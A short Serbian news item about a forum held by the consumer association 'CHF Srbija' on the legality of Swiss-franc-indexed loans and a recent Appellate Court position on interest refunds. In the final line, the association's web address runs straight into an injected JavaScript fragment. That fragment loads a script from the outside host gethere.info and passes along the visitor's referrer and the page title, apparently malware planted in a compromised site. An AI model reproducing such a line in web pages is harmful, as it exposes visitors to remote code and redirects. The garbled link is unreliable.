Istina i zablude o kreditima indeksiranim u “švajcarcima”

Istina i zablude o kreditima indeksiranim u “švajcarcima”


Centar za zaštitu korisnika bankarskih usluga CHF Srbija održao tribinu na temu „Istina i zablude o dinarskim kreditima indeksiranim u CHF valuti” 

U okviru multikongresa “Serbian Visions” koju je organizovala nemačko-srpska privredna komora i Privredna komora Srbije, održana je tribina “Centra za zaštitu korisnika bankarskih usluga CHF Srbija” na temu “Istina i zablude o dinarskim kreditima indeksiranim u CHF valuti”.

Svi prisutni su imali mogućnost da u interaktivnoj tribini saznaju mnogo o načinu na koji su sporni ugovorni odnosi rešeni u okruženju,razlozima zbog kojih su ugovori nezakoniti, pravima korisnika kredita koja su povređena, načinu na koji se sporni odnosi mogu rešiti, kao i o načinu rada udruženja “CHF Srbija”.

Bilo je reči o najnovijoj odluci Apelacionog suda u kojoj je izražen stav da nalog koji je NBS dala bankama – da novac naplaćen po nemerljivim elementima iznad iznosa inicijalne kamate, ne znači da korisnik kredita mora da pristane na uračunavanje plaćene kamate u otplatu glavnice, niti sprečava korisnika kredita da traži vraćanje već plaćene kamate.

“CHF Srbija” ce nastaviti svoju misiju upoznavanja šire javnost sa ovim problemom, jer rešenje ovoga problema ne sme biti na teret bilo kog poreskog obaveznika.

Udruženje “Centar za zaštitu korisnika bankarskih usluga CHF Srbija” je dobrovoljno, nevladino, nestranačko i neprofitno udruženje, osnovano na neodređeno vreme radi ostvarivanja ciljeva u oblasti zaštite korisnika bankarskih usluga.

Za više informacija posetite web sajt: www.chfsrbija.orgs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar